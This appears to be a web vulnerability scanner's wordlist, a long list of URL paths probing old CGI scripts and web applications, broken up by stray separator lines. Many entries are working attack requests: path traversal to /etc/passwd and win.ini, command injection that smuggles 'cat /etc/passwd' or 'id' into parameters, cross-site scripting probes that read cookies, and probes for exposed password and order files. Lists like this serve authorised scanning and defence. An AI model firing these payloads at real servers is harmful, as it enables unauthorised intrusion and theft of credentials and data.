cgi-bin/guestbook.cgi
|
||
|
|
cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
|
||
|
|
cgi-bin/guestbook.pl
|
||
|
|
cgi-bin/handler
|
||
|
|
cgi-bin/handler/netsonar;cat
|
||
|
|
cgi-bin/hello.bat?&dir+c:\
|
||
|
|
cgi-bin/hitview.cgi
|
||
|
|
cgi-bin/horde/test.php
|
||
|
|
cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
|
||
|
|
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
|
||
|
|
cgi-bin/htimage.exe
|
||
|
|
cgi-bin/htimage.exe/path/filename?2,2
|
||
|
|
cgi-bin/html2chtml.cgi
|
||
|
|
cgi-bin/html2wml.cgi
|
||
|
|
cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
|
||
|
|
cgi-bin/htsearch?-c/nonexistant
|
||
|
|
cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
|
||
|
|
cgi-bin/htsearch?exclude=%60/etc/passwd%60
|
||
|
|
cgi-bin/ibill.pm
|
||
|
|
cgi-bin/icat
|
||
|
|
cgi-bin/if/admin/nph-build.cgi
|
||
|
|
cgi-bin/ikonboard/help.cgi?
|
||
|
|
cgi-bin/imageFolio.cgi
|
||
|
|
cgi-bin/imagefolio/admin/admin.cgi
|
||
|
|
cgi-bin/imagemap
|
||
|
|
cgi-bin/imagemap.exe
|
||
|
|
cgi-bin/include/new-visitor.inc.php
|
||
|
|
cgi-bin/index.js0x70
|
||
|
|
cgi-bin/index.pl
|
||
|
|
cgi-bin/info2www
|
||
|
|
cgi-bin/infosrch.cgi
|
||
|
|
cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||
|
|
cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||
|
|
cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
|
||
|
|
cgi-bin/ion-p?page=../../../../../etc/passwd
|
||
|
|
cgi-bin/jailshell
|
||
|
|
cgi-bin/jj
|
||
|
|
cgi-bin/journal.cgi?folder=journal.cgi%00
|
||
|
|
cgi-bin/ksh
|
||
|
|
cgi-bin/lastlines.cgi?process
|
||
|
|
cgi-bin/listrec.pl
|
||
|
|
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
|
||
|
|
cgi-bin/log-reader.cgi
|
||
|
|
cgi-bin/log/
|
||
|
|
cgi-bin/log/nether-log.pl?checkit
|
||
|
|
cgi-bin/login.cgi
|
||
|
|
cgi-bin/login.pl
|
||
|
|
cgi-bin/login.pl?course_id=\"><SCRIPT>alert('Vulnerable')</SCRIPT>
|
||
|
|
cgi-bin/logit.cgi
|
||
|
|
cgi-bin/logs.pl
|
||
|
|
cgi-bin/logs/
|
||
|
|
cgi-bin/logs/access_log
|
||
|
|
cgi-bin/logs/error_log
|
||
|
|
cgi-bin/lookwho.cgi
|
||
|
|
cgi-bin/ls
|
||
|
|
cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/mail
|
||
|
|
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/mailform.exe
|
||
|
|
cgi-bin/mailit.pl
|
||
|
|
cgi-bin/maillist.cgi
|
||
|
|
cgi-bin/maillist.pl
|
||
|
|
cgi-bin/mailnews.cgi
|
||
|
|
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/main_menu.pl
|
||
|
|
cgi-bin/majordomo.pl
|
||
|
|
cgi-bin/man.sh
|
||
|
|
cgi-bin/man2html
|
||
|
|
cgi-bin/mastergate/search.cgi?search=0&search_on=all
|
||
|
|
cgi-bin/meta.pl
|
||
|
|
cgi-bin/mgrqcgi
|
||
|
|
cgi-bin/mini_logger.cgi
|
||
|
|
cgi-bin/minimal.exe
|
||
|
|
cgi-bin/mkilog.exe
|
||
|
|
cgi-bin/mkplog.exe
|
||
|
|
cgi-bin/mmstdod.cgi
|
||
|
|
cgi-bin/moin.cgi?test
|
||
|
|
cgi-bin/mojo/mojo.cgi
|
||
|
|
cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/mrtg.cgi?cfg=blah
|
||
|
|
cgi-bin/ms_proxy_auth_query/
|
||
|
|
cgi-bin/mt-static/
|
||
|
|
cgi-bin/mt-static/mt-check.cgi
|
||
|
|
cgi-bin/mt-static/mt-load.cgi
|
||
|
|
cgi-bin/mt-static/mt.cfg
|
||
|
|
cgi-bin/mt/
|
||
|
|
cgi-bin/mt/mt-check.cgi
|
||
|
|
cgi-bin/mt/mt-load.cgi
|
||
|
|
cgi-bin/mt/mt.cfg
|
||
|
|
cgi-bin/multihtml.pl?multi=/etc/passwd%00html
|
||
|
|
cgi-bin/musicqueue.cgi
|
||
|
|
cgi-bin/myguestbook.cgi?action=view
|
||
|
|
cgi-bin/namazu.cgi
|
||
|
|
cgi-bin/nbmember.cgi?cmd=list_all_users
|
||
|
|
cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
|
||
|
|
cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
|
||
|
|
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/netpad.cgi
|
||
|
|
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/nimages.php
|
||
|
|
cgi-bin/nlog-smb.cgi
|
||
|
|
cgi-bin/nlog-smb.pl
|
||
|
|
cgi-bin/non-existent.pl
|
||
|
|
cgi-bin/noshell
|
||
|
|
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/nph-error.pl
|
||
|
|
cgi-bin/nph-exploitscanget.cgi
|
||
|
|
cgi-bin/nph-maillist.pl
|
||
|
|
cgi-bin/nph-publish
|
||
|
|
cgi-bin/nph-publish.cgi
|
||
|
|
cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
|
||
|
|
cgi-bin/nph-test-cgi
|
||
|
|
cgi-bin/ntitar.pl
|
||
|
|
cgi-bin/opendir.php?/etc/passwd
|
||
|
|
cgi-bin/orders/orders.txt
|
||
|
|
cgi-bin/pagelog.cgi
|
||
|
|
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
|
||
|
|
cgi-bin/parse-file
|
||
|
|
cgi-bin/pass
|
||
|
|
cgi-bin/passwd
|
||
|
|
cgi-bin/passwd.txt
|
||
|
|
cgi-bin/password
|
||
|
|
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
|
||
|
|
cgi-bin/perl
|
||
|
|
cgi-bin/perl.exe
|
||
|
|
cgi-bin/perl.exe?-v
|
||
|
|
cgi-bin/perl?-v
|
||
|
|
cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
|
||
|
|
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
|
||
|
|
cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
|
||
|
|
cgi-bin/phf
|
||
|
|
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
|
||
|
|
cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
|
||
|
|
cgi-bin/photo/
|
||
|
|
cgi-bin/photo/manage.cgi
|
||
|
|
cgi-bin/php-cgi
|
||
|
|
cgi-bin/php.cgi?/etc/passwd
|
||
|
|
cgi-bin/plusmail
|
||
|
|
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
|
||
|
|
cgi-bin/pollssi.cgi
|
||
|
|
cgi-bin/post-query
|
||
|
|
cgi-bin/post16.exe
|
||
|
|
cgi-bin/post32.exe|dir%20c:\
|
||
|
|
cgi-bin/post_query
|
||
|
|
cgi-bin/postcards.cgi
|
||
|
|
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/ppdscgi.exe
|
||
|
|
cgi-bin/printenv
|
||
|
|
cgi-bin/printenv.tmp
|
||
|
|
cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
|
||
|
|
cgi-bin/processit.pl
|
||
|
|
cgi-bin/profile.cgi
|
||
|
|
cgi-bin/pu3.pl
|
||
|
|
cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
|
||
|
|
cgi-bin/query
|
||
|
|
cgi-bin/query?mss=%2e%2e/config
|
||
|
|
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
|
||
|
|
cgi-bin/quikstore.cfg
|
||
|
|
cgi-bin/quizme.cgi
|
||
|
|
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/ratlog.cgi
|
||
|
|
cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
|
||
|
|
cgi-bin/redirect
|
||
|
|
cgi-bin/register.cgi
|
||
|
|
cgi-bin/replicator/webpage.cgi/
|
||
|
|
cgi-bin/responder.cgi
|
||
|
|
cgi-bin/retrieve_password.pl
|
||
|
|
cgi-bin/rguest.exe
|
||
|
|
cgi-bin/rightfax/fuwww.dll/?
|
||
|
|
cgi-bin/rksh
|
||
|
|
cgi-bin/rmp_query
|
||
|
|
cgi-bin/robadmin.cgi
|
||
|
|
cgi-bin/robpoll.cgi
|
||
|
|
cgi-bin/rpm_query
|
||
|
|
cgi-bin/rsh
|
||
|
|
cgi-bin/rtm.log
|
||
|
|
cgi-bin/rwcgi60
|
||
|
|
cgi-bin/rwcgi60/showenv
|
||
|
|
cgi-bin/rwwwshell.pl
|
||
|
|
cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
|
||
|
|
cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
|
||
|
|
cgi-bin/sbcgi/sitebuilder.cgi
|
||
|
|
cgi-bin/scoadminreg.cgi
|
||
|
|
cgi-bin/scripts/*%0a.pl
|
||
|
|
cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
|
||
|
|
cgi-bin/search
|
||
|
|
cgi-bin/search.cgi
|
||
|
|
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
|
||
|
|
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
|
||
|
|
cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
|
||
|
|
cgi-bin/search.pl
|
||
|
|
cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
|
||
|
|
cgi-bin/sendform.cgi
|
||
|
|
cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
|
||
|
|
cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/sensepost.exe?/c+dir
|
||
|
|
cgi-bin/session/adminlogin
|
||
|
|
cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
|
||
|
|
cgi-bin/sh
|
||
|
|
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
|
||
|
|
cgi-bin/shop.pl/page=;cat%20shop.pl|
|
||
|
|
cgi-bin/shop/auth_data/auth_user_file.txt
|
||
|
|
cgi-bin/shop/orders/orders.txt
|
||
|
|
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
|
||
|
|
cgi-bin/show.pl
|
||
|
|
cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/showuser.cgi
|
||
|
|
cgi-bin/shtml.dll
|
||
|
|
cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
|
||
|
|
cgi-bin/simplestguest.cgi
|
||
|
|
cgi-bin/simplestmail.cgi
|
||
|
|
cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
|
||
|
|
cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
|
||
|
|
cgi-bin/snorkerz.bat
|
||
|
|
cgi-bin/snorkerz.cmd
|
||
|
|
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
|
||
|
|
cgi-bin/spin_client.cgi?aaaaaaaa
|
||
|
|
cgi-bin/ss
|
||
|
|
cgi-bin/sscd_suncourier.pl
|
||
|
|
cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||
|
|
cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
|
||
|
|
cgi-bin/stat.pl
|
||
|
|
cgi-bin/stat/
|
||
|
|
cgi-bin/stats-bin-p/reports/index.html
|
||
|
|
cgi-bin/stats.pl
|
||
|
|
cgi-bin/stats.prf
|
||
|
|
cgi-bin/stats/
|
||
|
|
cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
|
||
|
|
cgi-bin/stats_old/
|
||
|
|
cgi-bin/statsconfig
|
||
|
|
cgi-bin/statusconfig.pl
|
||
|
|
cgi-bin/statview.pl
|
||
|
|
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
|
||
|
|
cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/store/agora.cgi?page=whatever33.html
|
||
|
|
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/survey
|
||
|
|
cgi-bin/survey.cgi
|
||
|
|
cgi-bin/sws/admin.html
|
||
|
|
cgi-bin/sws/manager.pl
|
||
|
|
cgi-bin/tablebuild.pl
|
||
|
|
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
|
||
|
|
cgi-bin/tcsh
|
||
|
|
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/test-cgi
|
||
|
|
cgi-bin/test-cgi.bat
|
||
|
|
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
|
||
|
|
cgi-bin/test-cgi.tcl
|
||
|
|
cgi-bin/test-cgi?/*
|
||
|
|
cgi-bin/test-env
|
||
|
|
cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||
|
|
cgi-bin/test.cgi
|
||
|
|
cgi-bin/test/test.cgi
|
||
|
|
cgi-bin/test2.pl?<script>alert('Vulnerable');</script>
|
||
|
|
cgi-bin/testcgi.exe
|
||
|
|
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
|
||
|
|
cgi-bin/testing_whatever
|
||
|
|
cgi-bin/texis.exe/junk
|
||
|
|
cgi-bin/texis/junk
|
||
|
|
cgi-bin/texis/phine
|
||
|
|
cgi-bin/textcounter.pl
|
||
|
|
cgi-bin/tidfinder.cgi
|
||
|
|
cgi-bin/tigvote.cgi
|
||
|
|
cgi-bin/title.cgi
|
||
|
|
cgi-bin/tpgnrock
|
||
|
|
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/troops.cgi
|
||
|
|
cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
|
||
|
|
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/ultraboard.cgi
|
||
|
|
cgi-bin/ultraboard.pl
|
||
|
|
cgi-bin/unlg1.1
|
||
|
|
cgi-bin/unlg1.2
|
||
|
|
cgi-bin/update.dpgs
|
||
|
|
cgi-bin/upload.cgi
|
||
|
|
cgi-bin/uptime
|
||
|
|
cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
|
||
|
|
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/utm/admin
|
||
|
|
cgi-bin/utm/utm_stat
|
||
|
|
cgi-bin/view-source
|
||
|
|
cgi-bin/view-source?view-source
|
||
|
|
cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
|
||
|
|
cgi-bin/viewlogs.pl
|
||
|
|
cgi-bin/viewsource?/etc/passwd
|
||
|
|
cgi-bin/viralator.cgi
|
||
|
|
cgi-bin/virgil.cgi
|
||
|
|
cgi-bin/visadmin.exe
|
||
|
|
cgi-bin/visitor.exe
|
||
|
|
cgi-bin/vote.cgi
|
||
|
|
cgi-bin/vpasswd.cgi
|
||
|
|
cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
|
||
|
|
cgi-bin/w3-msql
|
||
|
|
cgi-bin/w3-sql
|
||
|
|
cgi-bin/wais.pl
|
||
|
|
cgi-bin/way-board.cgi?db=/etc/passwd%00
|
||
|
|
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
|
||
|
|
cgi-bin/wconsole.dll
|
||
|
|
cgi-bin/webais
|
||
|
|
cgi-bin/webbbs.cgi
|
||
|
|
cgi-bin/webbbs.exe
|
||
|
|
cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
|
||
|
|
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
|
||
|
|
cgi-bin/webdist.cgi
|
||
|
|
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
|
||
|
|
cgi-bin/webdriver
|
||
|
|
cgi-bin/webfind.exe?keywords=01234567890123456789
|
||
|
|
cgi-bin/webgais
|
||
|
|
cgi-bin/webif.cgi
|
||
|
|
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/webmap.cgi
|
||
|
|
cgi-bin/webnews.pl
|
||
|
|
cgi-bin/webplus.exe?about
|
||
|
|
cgi-bin/webplus?about
|
||
|
|
cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/websendmail
|
||
|
|
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
|
||
|
|
cgi-bin/webutil.pl
|
||
|
|
cgi-bin/webutils.pl
|
||
|
|
cgi-bin/webwho.pl
|
||
|
|
cgi-bin/wguest.exe
|
||
|
|
cgi-bin/where.pl?sd=ls%20/etc
|
||
|
|
cgi-bin/whois.cgi?action=load&whois=%3Bid
|
||
|
|
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
|
||
|
|
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
|
||
|
|
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
|
||
|
|
cgi-bin/windmail
|
||
|
|
cgi-bin/windmail.exe
|
||
|
|
cgi-bin/wrap
|
||
|
|
cgi-bin/ws_ftp.ini
|
||
|
|
cgi-bin/www-sql
|
||
|
|
cgi-bin/wwwadmin.pl
|
||
|
|
cgi-bin/wwwboard.cgi.cgi
|
||
|
|
cgi-bin/wwwboard.pl
|
||
|
|
cgi-bin/wwwstats.pl
|
||
|
|
cgi-bin/wwwthreads/3tvars.pm
|
||
|
|
cgi-bin/wwwthreads/w3tvars.pm
|
||
|
|
cgi-bin/wwwwais
|
||
|
|
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-bin/zsh
|
||
|
|
cgi-dos/args.bat
|
||
|
|
cgi-lib.pl
|
||
|
|
cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-local/cgiemail-1.4/cgicso?query=AAA
|
||
|
|
cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
|
||
|
|
cgi-local/cgiemail-1.6/cgicso?query=AAA
|
||
|
|
cgi-shl/win-c-sample.exe
|
||
|
|
cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgi-sys/FormMail-clone.cgi
|
||
|
|
cgi-sys/addalink.cgi
|
||
|
|
cgi-sys/cgiecho
|
||
|
|
cgi-sys/cgiemail
|
||
|
|
cgi-sys/countedit
|
||
|
|
cgi-sys/domainredirect.cgi
|
||
|
|
cgi-sys/entropybanner.cgi
|
||
|
|
cgi-sys/entropysearch.cgi
|
||
|
|
cgi-sys/helpdesk.cgi
|
||
|
|
cgi-sys/mchat.cgi
|
||
|
|
cgi-sys/randhtml.cgi
|
||
|
|
cgi-sys/realhelpdesk.cgi
|
||
|
|
cgi-sys/realsignup.cgi
|
||
|
|
cgi-sys/scgiwrap
|
||
|
|
cgi-sys/signup.cgi
|
||
|
|
cgi-win/cgitest.exe
|
||
|
|
cgi-win/uploader.exe
|
||
|
|
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
|
||
|
|
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
|
||
|
|
cgi/cgiproc?
|
||
|
|
cgicso?query=<script>alert('Vulnerable')</script>
|
||
|
|
cgicso?query=<script>alert('XSS')</script>
|
||
|
|
cgicso?query=AAA
|
||
|
|
cgiforum.pl?thesection=../../../../../../../../../../etc
|
||
|
|
cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
|
||
|
|
cgimail.exe
|
||
|
|
cgis/wwwboard/wwwboard.cgi
|
||
|
|
cgis/wwwboard/wwwboard.pl
|
||
|
|
cgitest.exe
|
||
|
|
cgiwrap
|
||
|
|
cgiwrap/%3Cfont%20color=red%3E
|
||
|
|
cgiwrap/~@U
|
||
|
|
cgiwrap/~@USERS
|
||
|
|
cgiwrap/~JUNK(5)
|
||
|
|
cgiwrap/~root
|
||
|
|
change-your-password.pl
|
||
|
|
chassis/config/GeneralChassisConfig.html
|
||
|
|
chat/!nicks.txt
|
||
|
|
chat/!pwds.txt
|
||
|
|
chat/data/usr
|
||
|
|
chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
|
||
|
|
chat_dir/register.php
|
||
|
|
chatlog.nsf
|
||
|
|
checkout_payment.php
|
||
|
|
class/mysql.class
|
||
|
|
classified.cgi
|
||
|
|
classifieds
|
||
|
|
classifieds.cgi
|
||
|
|
classifieds/classifieds.cgi
|
||
|
|
classifieds/index.cgi
|
||
|
|
clbusy.nsf
|
||
|
|
cldbdir.nsf
|
||
|
|
cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
|
||
|
|
cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
|
||
|
|
clickcount.pl?view=test
|
||
|
|
clickresponder.pl
|
||
|
|
client/
|
||
|
|
cliente/
|
||
|
|
clientes/
|
||
|
|
clients/
|
||
|
|
clocktower/
|
||
|
|
clusta4.nsf
|
||
|
|
clusterframe.jsp
|
||
|
|
clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
|
||
|
|
cm/
|
||
|
|
cmd.exe?/c+dir
|
||
|
|
cmd1.exe?/c+dir
|
||
|
|
code.php
|
||
|
|
code.php3
|
||
|
|
code/
|
||
|
|
collect4.nsf
|
||
|
|
com
|
||
|
|
com/
|
||
|
|
com/novell/
|
||
|
|
com/novell/gwmonitor/help/en/default.htm
|
||
|
|
com/novell/webaccess
|
||
|
|
com/novell/webaccess/help/en/default.htm
|
||
|
|
com/novell/webpublisher/help/en/default.htm
|
||
|
|
com5..........................................................................................................................................................................................................................box
|
||
|
|
com5.java
|
||
|
|
com5.pl
|
||
|
|
commandit.cgi
|
||
|
|
comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>
|
||
|
|
comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
|
||
|
|
comments/browse.php?fid=2&tid=4&go=<script>alert('Vulnerable')</script>
|
||
|
|
commerce.cgi?page=../../../../../../../../../../etc
|
||
|
|
commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
|
||
|
|
common.php?f=0&ForumLang=../../../../../../../../../../etc
|
||
|
|
common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
|
||
|
|
common/listrec.pl
|
||
|
|
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
|
||
|
|
communicator/
|
||
|
|
communique.asp
|
||
|
|
community/forumdisplay.php
|
||
|
|
community/index.php?analized=anything
|
||
|
|
community/member.php
|
||
|
|
compatible.cgi
|
||
|
|
compra/
|
||
|
|
compras/
|
||
|
|
compressed/
|
||
|
|
compte.php
|
||
|
|
conecta/
|
||
|
|
config.inc
|
||
|
|
config.php
|
||
|
|
config/
|
||
|
|
config/checks.txt
|
||
|
|
config/html/cnf_gi.htm
|
||
|
|
connect/
|
||
|
|
console
|
||
|
|
conspass.chl+
|
||
|
|
consport.chl+
|
||
|
|
content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
|
||
|
|
content/base/build/explorer/none.php?/etc/passwd
|
||
|
|
contents.php?new_language=elvish&mode=select
|
||
|
|
contents/extensions/asp/1
|
||
|
|
convert-date.php
|
||
|
|
correo/
|
||
|
|
count.cgi
|
||
|
|
counter-ord
|
||
|
|
counter/
|
||
|
|
counter/1/n/n/0/3/5/0/a/123.gif
|
||
|
|
counterbanner
|
||
|
|
counterbanner-ord
|
||
|
|
counterfiglet-ord
|
||
|
|
counterfiglet/nc/
|
||
|
|
cp/rac/nsManager.cgi
|
||
|
|
cpa.nsf
|
||
|
|
cpanel/
|
||
|
|
cplogfile.log
|
||
|
|
cpqlogin.htm
|
||
|
|
credit/
|
||
|
|
crypto/
|
||
|
|
cs
|
||
|
|
csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
|
||
|
|
csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
|
||
|
|
csLive
|
||
|
|
csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
|
||
|
|
csNews.cgi
|
||
|
|
csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
|
||
|
|
csPassword.cgi
|
||
|
|
csPassword.cgi?command=remove%20
|
||
|
|
csPassword/csPassword.cgi
|
||
|
|
csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
|
||
|
|
csh
|
||
|
|
css
|
||
|
|
cstat.pl
|
||
|
|
cuenta/
|
||
|
|
cuentas/
|
||
|
|
current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
|
||
|
|
current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
|
||
|
|
custdata/
|
||
|
|
customerdata.nsf
|
||
|
|
customers/
|
||
|
|
cutecast/members/
|
||
|
|
cutenews/comments.php
|
||
|
|
cutenews/index.php?debug
|
||
|
|
cutenews/search.php
|
||
|
|
cutenews/shownews.php
|
||
|
|
cvsblame.cgi?file=<script>alert('Vulnerable')</script>
|
||
|
|
cvsblame.cgi?file=<script>alert('XSS')</script>
|
||
|
|
cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
|
||
|
|
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
|
||
|
|
cvslog.cgi?file=<script>alert('Vulnerable')</script>
|
||
|
|
cvslog.cgi?file=<script>alert('XSS')</script>
|
||
|
|
cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
|
||
|
|
